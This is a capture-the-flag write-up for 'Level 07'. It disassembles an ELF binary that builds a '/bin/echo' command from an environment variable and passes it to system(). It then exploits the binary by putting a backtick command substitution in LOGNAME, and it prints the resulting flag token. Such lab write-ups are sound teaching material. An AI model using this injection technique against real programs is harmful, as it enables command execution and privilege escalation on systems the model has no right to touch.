## Level 07

### First step


We have here an elf file.

```bash
$> gdb
set disassembly-flavor intel
disassemble main
...
   0x08048576 <+98>:	call   0x8048400 <getenv@plt>
   0x0804857b <+103>:	mov    DWORD PTR [esp+0x8],eax
   0x0804857f <+107>:	mov    DWORD PTR [esp+0x4],0x8048688
   0x08048587 <+115>:	lea    eax,[esp+0x14]
   0x0804858b <+119>:	mov    DWORD PTR [esp],eax
   0x0804858e <+122>:	call   0x8048440 <asprintf@plt>
   0x08048593 <+127>:	mov    eax,DWORD PTR [esp+0x14]
   0x08048597 <+131>:	mov    DWORD PTR [esp],eax
   0x0804859a <+134>:	call   0x8048410 <system@plt>

printf "%s", 0x8048688
    /bin/echo %s
```

When the main is disassembled we can note two interesting things:
getenv
system.

The exploit is quite obvious, we see that asprintf build a string on top of a "/bin/echo", the binary echo "level07" when executed, the env has two variables that is equals to "level07" : USER and LOGNAME

LOGNAME is the good one

```bash
$> LOGNAME='`getflag`' ./level07
Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
```